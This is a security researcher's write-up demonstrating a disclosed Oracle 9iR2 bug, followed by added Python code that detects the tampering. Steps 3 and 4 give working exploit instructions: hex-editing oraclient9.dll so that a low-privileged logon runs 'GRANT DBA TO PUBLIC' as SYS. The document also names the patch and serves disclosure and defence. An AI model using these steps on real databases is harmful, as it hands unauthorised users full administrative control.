Demonstrating the ALTER SESSION bug reported by Imperva – December 28th 2006   paul.wright@orasec.com

http://www.imperva.com/application_defense_center/papers/oracle-dbms-01172006.html

The bug is that the client SQL used to set up the session's language environment is a hard-coded ALTER SESSION statement, and that statement can be changed with a hex editor to an arbitrary SQL statement. The replaced SQL runs on the server as SYS when the client logs on, even if the account the client logs on with is a low-privileged one.

  1. Install Oracle database 9iR2

http://www.oracle.com/technology/software/products/oracle9i/htdocs/winsoft.html

  2. Create a low privileged user

create user userexample identified by userexample
default tablespace users
temporary tablespace temp;

grant create session to userexample;
grant connect to userexample;
grant resource to userexample;
alter user userexample quota unlimited on users;

  3. Edit the Oracle client DLL so that it grants DBA to PUBLIC instead of just changing the session. You will find oraclient9.dll in ORACLE_HOME/bin.

Use a hex editor such as UltraEdit and search for the ALTER SESSION statement below.

Then change the SQL from “ALTER SESSION SET ” to “GRANT DBA TO PUBLIC--”.

When you save the file, UltraEdit will prompt you to change the file name, because Windows does not want you to overwrite the .dll. Rename the old file, then give the new file the original name. It is a good idea to back up the original in a separate folder so you can go back if you make a mistake.

  4. Connect as the low privileged user

Sqlplus> conn userexample/userexample@dbname;

This logon runs the SQL embedded in oraclient9.dll.

Log out and back in again, and PUBLIC will now be DBA.

This has been tested and works as described above.

The solution is to install the January 2006 Critical Patch Update (CPU), and do not forget to run catcpu.sql at the end of the patch installation process.
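Two checks a DBA or incident responder can run for this issue, given here as an added example that is not part of the original write-up and not Oracle's code: an integrity audit of a copy of the client library (does it still carry its ALTER SESSION SET statement, and does it now embed a grant to PUBLIC), and an audit of role grants as returned by DBA_ROLE_PRIVS, where a role held by PUBLIC is what a successful run of the modified client leaves behind. The library images and grant rows below are constructed sample data; the known-good hash is a placeholder you would replace with the hash of a pristine oraclient9.dll, and the checks assume the embedded SQL is stored as plain ASCII.

```python
"""
Detection helpers for the tampered-client-library issue described above.

Hypothetical example code: not from the original write-up and not from Oracle.
"""
import hashlib
import re
from typing import Iterable, List, Optional, Tuple

# The client library normally embeds an "ALTER SESSION SET ..." statement.
# Assumption: it is stored as plain ASCII; a UTF-16 copy would need a second pass.
EXPECTED_SESSION_SQL = re.compile(rb"ALTER\s+SESSION\s+SET\b", re.IGNORECASE)

# A role or privilege grant to PUBLIC has no business inside a client library.
GRANT_TO_PUBLIC = re.compile(rb"GRANT\s+[A-Z_ ,]+?\s+TO\s+PUBLIC", re.IGNORECASE)

# Roles that make a grant to PUBLIC an immediate incident rather than a review item.
HIGH_PRIVILEGE_ROLES = {
    "DBA", "IMP_FULL_DATABASE", "EXP_FULL_DATABASE",
    "SELECT_CATALOG_ROLE", "EXECUTE_CATALOG_ROLE",
}


def sha256_hex(blob: bytes) -> str:
    """Hex SHA-256 of a file image, for comparison against a known-good baseline."""
    return hashlib.sha256(blob).hexdigest()


def audit_client_library(blob: bytes, known_good_sha256: Optional[str] = None) -> List[str]:
    """Return findings for a client library image; an empty list means clean."""
    findings: List[str] = []
    if known_good_sha256 is not None and sha256_hex(blob) != known_good_sha256.lower():
        findings.append("hash differs from known-good baseline")
    if EXPECTED_SESSION_SQL.search(blob) is None:
        findings.append("hard-coded ALTER SESSION SET statement is missing")
    for match in GRANT_TO_PUBLIC.finditer(blob):
        text = match.group().decode("ascii", "replace")
        findings.append(f"grant to PUBLIC embedded at offset {match.start()}: {text}")
    return findings


def audit_public_role_grants(rows: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """
    rows are (GRANTEE, GRANTED_ROLE) pairs, e.g. fetched with
        SELECT grantee, granted_role FROM dba_role_privs;
    PUBLIC should hold no roles, so every role granted to it is reported,
    tagged "critical" when it is in HIGH_PRIVILEGE_ROLES and "review" otherwise.
    """
    findings: List[Tuple[str, str]] = []
    for grantee, role in rows:
        if grantee.upper() == "PUBLIC":
            severity = "critical" if role.upper() in HIGH_PRIVILEGE_ROLES else "review"
            findings.append((role.upper(), severity))
    return findings


# Constructed sample data (not real file contents or real query output).
CLEAN_IMAGE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"ALTER SESSION SET NLS_LANGUAGE= 'AMERICAN' NLS_TERRITORY= 'AMERICA'\x00"
)
TAMPERED_IMAGE = CLEAN_IMAGE.replace(b"ALTER SESSION SET", b"GRANT DBA TO PUBLIC--")
KNOWN_GOOD_SHA256 = sha256_hex(CLEAN_IMAGE)  # placeholder for the pristine DLL's hash

SAMPLE_ROLE_ROWS = [
    ("USEREXAMPLE", "CONNECT"),
    ("USEREXAMPLE", "RESOURCE"),
    ("PUBLIC", "DBA"),
]

if __name__ == "__main__":
    for name, image in (("clean", CLEAN_IMAGE), ("tampered", TAMPERED_IMAGE)):
        print(name, audit_client_library(image, KNOWN_GOOD_SHA256) or ["no findings"])
    print("roles granted to PUBLIC:", audit_public_role_grants(SAMPLE_ROLE_ROWS))
```

On a real host, read oraclient9.dll into `blob` and compare against a hash taken from a clean installation; the string search alone will not catch a replacement statement that avoids the word GRANT, so the hash comparison is the authoritative check and the string checks are the quick triage. If the role audit reports DBA on PUBLIC, revoke it and treat every client that has connected since the grant as suspect.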

More details to come in my new book:

http://www.rampant-books.com/book_2007_1_oracle_forensics.htm and discussion at my blog http://orasec.blogspot.com/ 

END.